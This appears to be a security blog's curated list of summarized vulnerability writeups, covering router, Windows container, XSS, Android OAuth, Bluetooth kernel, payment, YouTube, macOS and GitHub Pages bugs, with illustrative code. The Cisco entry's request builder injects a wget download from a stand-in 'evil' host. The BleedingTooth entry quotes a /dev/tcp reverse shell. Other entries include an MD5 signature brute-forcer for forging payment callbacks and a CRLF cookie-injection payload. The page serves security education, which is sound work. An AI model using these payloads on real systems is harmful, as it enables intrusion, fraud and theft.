Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cisco RV34X Series – Authentication Bypass and Remote Command Execution - 453

IoT Inspector    Reference → Posted 4 Years Ago
  • This router used to have NO authentication on the file upload functionality in upload.cgi. After the vendor fixed this, everything appeared to be okay...
  • However, the Nginx configuration literally just checks that the Authorization header is not NULL. So, passing in any Authorization header works just fine. Now, there is an authentication bypass in the file upload functionality. Sometimes, bugs are that easy!
  • The cookie field has a command injection when its value is passed to cURL. So, crafting a malicious cookie (without semicolons) combined with the authentication bypass above allows for remote compromise of the device. Easy!
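The chain is simple enough to sketch. A hypothetical request builder (the endpoint upload.cgi comes from the writeup; the form and cookie names are my assumptions) might look like:

```python
# Sketch of the two chained bugs from the writeup. Only upload.cgi is
# from the article; the cookie name and exploitation details are assumed.

def build_bypass_request(host: str, payload: str) -> str:
    """Builds a raw HTTP upload request that (1) satisfies the Nginx
    'Authorization header is non-NULL' check with a junk value, and
    (2) smuggles a cURL command-injection payload in the cookie.
    The injection context rejects semicolons, so a backtick subshell
    is used here as an illustration."""
    assert ";" not in payload, "the injection context rejects semicolons"
    cookie = f"sessionid=`{payload}`"  # backtick subshell, no semicolons needed
    return (
        f"POST /upload.cgi HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: anything-non-null\r\n"  # bug 1: only checked for presence
        f"Cookie: {cookie}\r\n"                  # bug 2: passed unsanitized to cURL
        f"\r\n"
    )

req = build_bypass_request("192.168.1.1", "wget http://evil/x -O /tmp/x")
```

The key observation is that the Authorization header only needs to exist, not to be valid, and the backtick subshell keeps the payload semicolon-free.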

Who Contains the Containers? - 452

James Forshaw - Project Zero (P0)    Reference → Posted 4 Years Ago
  • Windows 10 added support for application containerization. It is quite similar to how containerization is done on Linux, but wildly different in the details. While Docker on Windows works quite well, the implementation details for containers are abstracted away and not well-documented (besides on MSDN). This article is an overview of Windows containerization primitives and four bugs found along the way.
  • The goal of containers is to hide the real OS from the application. On Windows, the Server Silo allows the redirection of resources such as the object manager, registry, and networking. This is a special type of Job object.
  • There are two types of containers on Windows: Windows Server Containers and Hyper-V Isolated Containers. The difference is that the Hyper-V version runs in a lightweight VM under the hypervisor. The current documentation says that only the Hyper-V container type carries security guarantees, even though they are both containers.
  • The author wanted to create their own container and understand what was going on. Luckily, Microsoft has a simple Go client, and Windows Docker images exist as well. After setting up a nice testing environment, it was time to find some vulns!
  • As the ContainerUser, the author wanted to see the permissions of this user. Although the groups did not seem interesting, the user had the SeImpersonatePrivilege! This permission allows the user to impersonate any other user, including an administrator. This is a good (or even bad?) start to the research.
  • The second bug was a registry key issue. When using relative opens on registry keys, the kernel ignored the registry overlays. So, a non-administrative user could access keys on the host, provided they could pass the access check.
  • Another issue was found with the registry keys and symbolic links. When accessing a symbolic link in a hive (a grouping of registry keys), a kernel component should reject the symbolic link or verify the ownership of its target. However, the function PsIsCurrentThreadInServerSilo will essentially always return TRUE. This appears to be something done in the testing phase that was never fixed.
  • Using the above bug, an attacker can use a kernel component to write to an arbitrary registry key. This could be used to escalate permissions within the container to cause major damage.
  • The final bug results from a discrepancy between application and server silos. On Linux, the chroot syscall can change the root directory for a process. In Windows land, a similar concept can be used to isolate an object manager namespace for users.
  • When attempting to find the right silo for the container, the code does NOT validate which type of silo it is. Because an application silo can be created by any user, this is really bad. To perform this attack, simply create an application silo and assign it to a process. Now, the silo manager will use this malicious silo as if it were on the host machine.
  • Because the namespace has been put onto the actual root location, data can be accessed on the host through the object manager. Damn, such a simple mistake led to such a horrible outcome!
  • Putting all of these bugs together, it is possible to write content to the root of the host's system drive. In particular, James uses the impersonation bug with the namespace bug to write to the host OS.

Rocket.chat XSS - 451

Maik Stegemann    Reference → Posted 4 Years Ago
  • Rocket.chat is an open source team chat platform. Probably something similar to Slack or Chime.
  • The chat had a piece of functionality that looked for links and created HTML anchor tags from them using a library called AutoLinker. However, Rocket.chat also supports Markdown, which interprets links itself.
  • By getting AutoLinker to parse the link first, then getting the Markdown renderer to parse THAT link, the HTML context gets messed up. The Markdown library does not expect already-parsed links to be passed in.
  • By using this bug with a specially crafted link, this can be turned into arbitrary JavaScript via some funky HTML tag usage. The XSS can be used for a complete account takeover. Stored XSS is the worst.
  • There is no bug with AutoLinker or the Markdown library. However, by using both of them together, it created a serious security issue. This is a super interesting finding and not something that I would have thought of.
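The parser-composition bug can be reproduced with two toy regex-based renderers (these are stand-ins, not Rocket.chat's or AutoLinker's real code):

```python
import re

def autolink(text):
    # Wraps bare URLs in anchor tags (toy version of AutoLinker).
    return re.sub(r'(https?://[^\s\)]+)', r'<a href="\1">\1</a>', text)

def markdown_links(text):
    # Converts [label](target) into an anchor (toy Markdown renderer).
    return re.sub(r'\[([^\]]*)\]\(([^\)]*)\)', r'<a href="\2">\1</a>', text)

msg = '[click](https://example.com/)'
step1 = autolink(msg)          # the URL inside the markdown link gets wrapped first
step2 = markdown_links(step1)  # markdown now embeds a whole tag inside href="..."
```

step2 ends up with an anchor tag nested inside another anchor's href attribute, with stray quotes that break out of the attribute context: exactly the kind of confusion that enabled the XSS, even though each parser is correct on its own.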

Chaining bugs to takeover Wind Vision accounts - 450

Leonidas Tsaousis    Reference → Posted 4 Years Ago
  • Wind Vision is a digital television service in Greece. All digital content is received via IP networks and it aims to be a next generation TV system. Because of this, the phone app is quite popular with over 50K downloads for Android.
  • What initially caught the researcher's eye was the login flow. To log in, the application opens a browser tab. If the credentials are correct, the user is logged in and navigated back to the application using deep links. There is a nice gif of the flow of the site.
  • A Deep Link is a way to register your own URL scheme for an application. There are also App Links, which are mostly the same. The main difference is that an App Link can only be opened by the designated app, with validation done at installation time to ensure this. Normally, an application wants to restrict who can call this endpoint and who can use the URL.
  • By double registering a URL handler in a different application, the user MUST choose which one to open. Because we are good social engineers, they will pick the malicious application.
  • Now, the authorization flow goes through the OAuth dance. Then, it sends the selected application an auth code. With control over the auth code, this can be turned into an Access Token quite easily! This could have been avoided if OAuth2 with PKCE had been used.
  • The author made an application to do exactly this. Although it requires a malicious application to be downloaded and a bad click on the user's part, this is still a really interesting finding! In the future, I will take the android:autoVerify="true" flag in an Android configuration more seriously.
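As a sketch of the mitigation mentioned above, here is the PKCE flow in miniature: the legitimate app keeps a secret verifier, so an attacker who intercepts only the auth code cannot redeem it (function names are illustrative, not any real OAuth library):

```python
import base64
import hashlib
import secrets

def make_pkce_pair():
    """Client side: generate a random code_verifier and its S256
    code_challenge (base64url-encoded SHA-256, padding stripped)."""
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    challenge = base64.urlsafe_b64encode(
        hashlib.sha256(verifier.encode()).digest()
    ).rstrip(b"=").decode()
    return verifier, challenge

def token_endpoint_check(stored_challenge, presented_verifier):
    """Server side: the token endpoint recomputes the challenge from the
    presented verifier; an attacker holding only the auth code fails here."""
    recomputed = base64.urlsafe_b64encode(
        hashlib.sha256(presented_verifier.encode()).digest()
    ).rstrip(b"=").decode()
    return recomputed == stored_challenge

verifier, challenge = make_pkce_pair()
```

Because the verifier never travels through the hijackable deep link, a malicious app that intercepts the redirect still cannot exchange the code for a token.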

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution - 449

Google    Reference → Posted 4 Years Ago
  • Within Linux, there is a separate sub-system for dealing with Bluetooth. The Bluetooth chip communicates with the host OS using the Host Controller Interface (HCI) protocol.
  • While manually reviewing the HCI event packet parser, the author noticed that a check against the HCI maximum event length had been removed. Reviewing the code path, the code consuming this data assumes a maximum size has already been validated, because the regular and extended variants share a duplicated path.
  • Because of this missing bounds check on a copy into a static buffer (via a memcpy), a buffer overflow occurs. The size change from Bluetooth 4.0 to 5.0, which raised the maximum from 31 to 255 bytes, is the reason for this issue. So, this bug is only reachable with newer Bluetooth devices.
  • With this buffer overflow on the heap, we can fully control members of the hci_dev struct. With this, we control something else that contains a function pointer! Great, but now we need a leak. This bug was not used in the complete exploit.
  • Going through another section of the Linux Bluetooth stack, it is time for another bug! There is a bail-out path if the AMP controller is invalid that fills out only the id and status fields of a struct. However, the struct a2mp_info_rsp contains other fields.
  • Because the other fields are never initialized, 16 bytes of stale kernel data can be routinely leaked to the attacker. To leak the right data, specific commands need to be sent to place data in the proper locations. However, this grooming just required some brute forcing to figure out.
  • While working on the memory leak, the author got a crash in the ERTM component. After tracing the code, the author realized that a type confusion was occurring when pointers were being passed around.
  • Exploiting the type confusion is tricky! Both objects have lots of pointers: we must line these up in such a way that we alter what we want without crashing. This is a powerful primitive though.
  • The only member that we can reasonably corrupt is the sk->sk_filter pointer. However, the actual object being passed in is ONLY of size 0x70 and the offset is at 0x110. So, do we control this? With our current object, no. However, this looks prime for some heap grooming!
  • The author goes into how this heap grooming is done; an object of an arbitrary size can be controlled with arbitrary content! However, the details are specific to the sub-system so I will not cover them.
  • With the setup above, we have an arbitrary read primitive! We have the initial memory leak (uninitialized memory) and now we can dereference an arbitrary pointer that is read back to us. This dereferencing is handy for other things as well.
  • With control over the sk_filter value being dereferenced, we can control a function pointer! This function pointer has a parameter that we can directly pass into RSI (second) after two dereferences.
  • With NX, the author explains their exploit strategy. Because we are using the CALL instruction, we must first COP before we can ROP. The trick to this is to find a gadget that can put RSI (which we control) into the stack pointer to control further execution.
  • To get kernel execution with the new ROP chain, the author uses a known technique to pop a shell. This is done by running /bin/bash -c /bin/bash</dev/tcp/IP/PORT via the run_cmd function in the kernel.
  • Overall, this is an awesome article from bug discovery to complete compromise. The author was even kind enough to leave a POC for us to look at!
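The missing check at the root of it all is easy to model. Here is a toy version of the patched parser (the 31/255 sizes come from the writeup; the structure is heavily simplified, and Python obviously cannot overflow the way the kernel's memcpy did):

```python
HCI_MAX_EVENT_SIZE = 31  # legacy advertising report limit (Bluetooth 4.0)

def parse_event(payload: bytes, buf_size: int = HCI_MAX_EVENT_SIZE) -> bytes:
    """Toy model of the vulnerable path: the kernel memcpy'd `payload`
    into a fixed-size buffer, assuming an upstream length check that had
    been removed. This models the *fixed* code: reject oversized input
    (a Bluetooth 5.0 extended report can carry up to 255 bytes)."""
    if len(payload) > buf_size:
        raise ValueError("oversized event: would overflow the static buffer")
    buf = bytearray(buf_size)
    buf[:len(payload)] = payload  # safe only because of the check above
    return bytes(buf)
```

With the check removed, a 255-byte extended report written into a 31-byte buffer is exactly the heap overflow the author found.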

Eliminating Data Races in Firefox – A Technical Report - 448

Mozilla    Reference → Posted 4 Years Ago
  • Race conditions are a common bug in multi-threaded and multi-process applications and are incredibly hard to track down. Using ThreadSanitizer, the Mozilla team essentially eliminated a bug class from Firefox! The Clang ThreadSanitizer is a tool that detects data races in C/C++ code by adding a significant amount of instrumentation.
  • Running the tool is nowhere near enough to figure out what is going on. The tool reports TWO types of races: benign and impactful. But, in reality, this classification is not sound. So, the Mozilla team decided to adopt a no-data-race policy in order to have the best security.
  • At first, this seemed like a very large task. However, most of the fixes were trivial and/or improved code quality. So, this task was taken on by the Mozilla team!
  • While running through the ThreadSanitizer cases, they found some interesting issues. First, bitfields were a common spot where races and real-world bugs occurred. Because the fields are abstracted away and atomic operations are not the default, this bug occurred all over the place. They created an abstract atomic class to make this easier to fix.
  • An additional cause was code that was expected to be single-threaded but was being used in a multi-threaded way. Of course, this yielded many bad bugs, especially in the configuration settings.
  • They also mention Late-Validated Races. This is essentially a boolean check for initialization, then taking the mutex only if needed. However, if the data is initialized after this check by two different threads, it creates undefined behavior. Instead, just write proper atomic code.
  • Even some Rust code had concurrency issues! The solution to these problems was to make the variables being accessed atomic.
  • Overall, the Thread Sanitizer looks like an amazing piece of software that can be used to find race conditions. In the future, I'll be using the whole bag of *SAN's to test my software.
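In Python terms, the fix Mozilla applied with their abstract atomic class is analogous to funneling every access through one synchronized wrapper instead of auditing each call site (a sketch, not Mozilla's code):

```python
import threading

class AtomicCounter:
    """Lock-protected counter: every read and write goes through the lock,
    so there is no racy code path to audit, which mirrors the 'wrap the
    field in an atomic type' fix rather than fixing call sites one by one."""
    def __init__(self):
        self._value = 0
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self._value += 1  # read-modify-write is now a single critical section

    @property
    def value(self):
        with self._lock:
            return self._value

counter = AtomicCounter()
threads = [
    threading.Thread(target=lambda: [counter.increment() for _ in range(10_000)])
    for _ in range(8)
]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

With the lock, eight threads of 10,000 increments always total 80,000; a bare `x += 1` shared across threads can silently lose updates, the exact class of bug ThreadSanitizer flags.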

What if you could deposit money into your Betting account for free? - 447

Mikey    Reference → Posted 4 Years Ago
  • Payment processors are an amazing attack surface! What if you could fake a transaction in some way or add money to an account? This is the holy grail of bugs, as it is directly leveraged to make money.
  • The author was looking for a way to exploit the usage of a payment processor in some application. They were looking for two things: a site that allowed the setting of a status_url and a weak protocol. They settled on the UK-based payment provider Skrill, because its security relied upon an MD5-hashed structure with only 10 characters as a nonce value.
  • With the ability to edit the location of the payment processor and the lack of entropy in the random values for the hash, the author cracked the nonce of the MD5 hash with a brute-force script that took under 24 hours. With this cracked value, it was NOW possible to create our own signature to send data to the backend.
  • By having this value ready, we could create our own signed values from the payment provider. The author proceeded to make 25K appear in their gambling account! The dream!
  • Overall, this is an interesting article on how several subtle oversights (and a crappy protocol) led to the arbitrary loading of money.
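The brute force is straightforward to sketch. This toy version assumes the signature is MD5(fields + secret) and uses a 4-digit secret so it runs instantly; the article's real nonce was 10 characters, hence the roughly 24-hour runtime:

```python
import hashlib
from itertools import product

# Toy reconstruction: the merchant signature is modeled as MD5 over the
# transaction fields plus a short low-entropy secret. The field layout
# and charset are assumptions for illustration, not Skrill's real format.
CHARSET = "0123456789"

def sign(fields, secret):
    return hashlib.md5((fields + secret).encode()).hexdigest()

def brute_force(fields, target_sig, length):
    """Enumerates every candidate secret of the given length until one
    reproduces the observed signature."""
    for candidate in product(CHARSET, repeat=length):
        guess = "".join(candidate)
        if sign(fields, guess) == target_sig:
            return guess
    return None

fields = "transaction_id=123&amount=100&status=2"
observed = sign(fields, "4242")          # what the attacker sees on the wire
recovered = brute_force(fields, observed, 4)
```

Once the secret is recovered, the attacker can sign arbitrary "payment succeeded" callbacks themselves, which is exactly how the fake deposits were made.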

I Built a TV That Plays All of Your Private YouTube Videos - 446

David Schütz    Reference → Posted 4 Years Ago
  • While sharing a video marked private on YouTube, the author wondered HOW a smart TV could magically play the video. From there, the TV APIs were reversed and exploited.
  • The model for playing a video that is private works as such:
    1. TV checks for a command from polling
    2. YouTube API checks to see if the user sent anything. If the user sent something, then return that command.
    3. Run the command (returned from the YouTube API) that was given from the user.
  • The vulnerability is that the user request does NOT have any CSRF protections. So, by creating a fake website, we can force the user's browser to send a request to YouTube that binds our TV to their account. The author then had to register a minimalist TV for this to work (lolz).
  • Even with the CSRF request, there was STILL one thing missing: which private video? It turns out that the request can be used to get a playlist. Because the playlist ID is predictable per user, this allowed ALL private videos to be seen once the vulnerability was found.
  • Although this attack requires user interaction, this was an awesome bug discovery! I appreciate that harder-to-test functionality was examined here; if it's easy to test, then everyone will test it.
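A minimal sketch of the missing protection: had the bind endpoint required a session-bound CSRF token, the forged cross-site request would fail (all names here are illustrative, not YouTube's real API):

```python
import hashlib
import hmac
import secrets

# Server-side secret used to derive per-session CSRF tokens.
SECRET_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Token handed to the legitimate page; derived from the session, so a
    third-party site cannot compute or read it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def bind_tv(session_id, tv_id, csrf_token):
    """Toy 'bind this TV to my account' endpoint WITH the CSRF check the
    real endpoint lacked. A forged cross-site request fails here because
    the attacker's page cannot obtain the victim's token."""
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(expected, csrf_token):
        return False  # reject: request did not originate from our own page
    # ... bind tv_id to this account ...
    return True
```

Without this check, any page the victim visits can fire the bind request in their authenticated browser session, which is exactly what the author's fake website did.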

This man thought opening a TXT file is fine, he thought wrong. - 445

Paulos Yibelo    Reference → Posted 4 Years Ago
  • TXT files are considered to be safe to open as they are plain files. Even most anti-virus solutions feel this way. So, getting TXT files to do bad things has massive impact.
  • On macOS, the default text editor is TextEdit. For TXT files, the default format is RTF instead of plain TXT, which allows customization of the formatting. The author noticed that CSS and HTML were allowed.
  • macOS attempted to prevent any sort of exfiltration via TXT files. However, denylists are hard to implement properly! Any time there is a denylist instead of an allowlist, you have stumbled on good hunting grounds.
  • By using an iframedoc element, the TXT file can include local files; this appeared to be the only way to do this.
  • The next trick was to use dangling markup to exfiltrate the data. This was done by adding a style tag to a remote site with the iframedoc in the middle of it. Once the iframedoc loaded, the data would be sent in a URL (or something like that).

Breaking GitHub Private Pages for $35k - 444

Robert Chen    Reference → Posted 4 Years Ago
  • GitHub is the most popular location to store code. With the number of features that GitHub offers, there is likely a plethora of bugs waiting to be discovered. On their Bug Bounty page, reading the flag at flag.private-org.github.io is worth 10K without user interaction, or 5K with user interaction.
  • The first issue was a CRLF injection on a URL parameter being added to a cookie. Because newlines could be injected into the cookie value being appended, the HTTP headers could be manually altered. The trick for this was a NULLBYTE encoding in order for the integer to be parsed properly.
  • Using the bug above, XSS was possible on the private page. Although this is impactful, there is a random nonce value that needs to be known as well.
  • To bypass the nonce check, the author decided to play with cookies. The __Host- cookie prefix is a security feature that makes sure cookies cannot be overwritten from different subdomains; this was used on the nonce cookie.
  • Because the author had code execution on one page, they could set cookies lower down on the subdomain chain. However, this is the exact attack that the __Host- prefix is meant to protect against!
  • The GitHub private pages server ignores capitalization in the cookie name, but the browser does not! So, it was possible to overwrite the value of this cookie using a differently cased version of the name.
  • An additional bug was that caching for the pages was keyed solely on the page id. Because of this, the cache response could be poisoned to perform the XSS whenever the page was viewed, without ever clicking on a link.
  • Most of these vulnerabilities were subtle issues that A) people don't check for and B) do not seem relevant. Amazing writeup!
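The first bug in the chain is easy to model. A toy reflection of a parameter into Set-Cookie shows both the header splitting and why rejecting CR/LF fixes it (the header and cookie names are illustrative, not GitHub's real ones):

```python
# Toy reconstruction of the CRLF injection: a URL parameter is reflected
# into a Set-Cookie header, and embedded CR/LF lets an attacker append
# arbitrary extra headers to the response.

def set_cookie_header_vulnerable(value):
    """Reflects the value with no filtering: CR/LF in `value` splits
    the response into additional attacker-controlled headers."""
    return f"Set-Cookie: page_token={value}"

def set_cookie_header_fixed(value):
    """The fix: refuse any value containing CR or LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header values")
    return f"Set-Cookie: page_token={value}"

# Note the casing trick: a server comparing cookie names
# case-insensitively, while the browser does not, lets an injected
# __HOST- cookie shadow the legitimate __Host- nonce cookie.
injected = "x\r\nSet-Cookie: __HOST-session=attacker"
raw = set_cookie_header_vulnerable(injected)  # now carries TWO Set-Cookie headers
```

One reflected parameter thus becomes a second, fully attacker-controlled cookie, which is the foothold the rest of the chain built on.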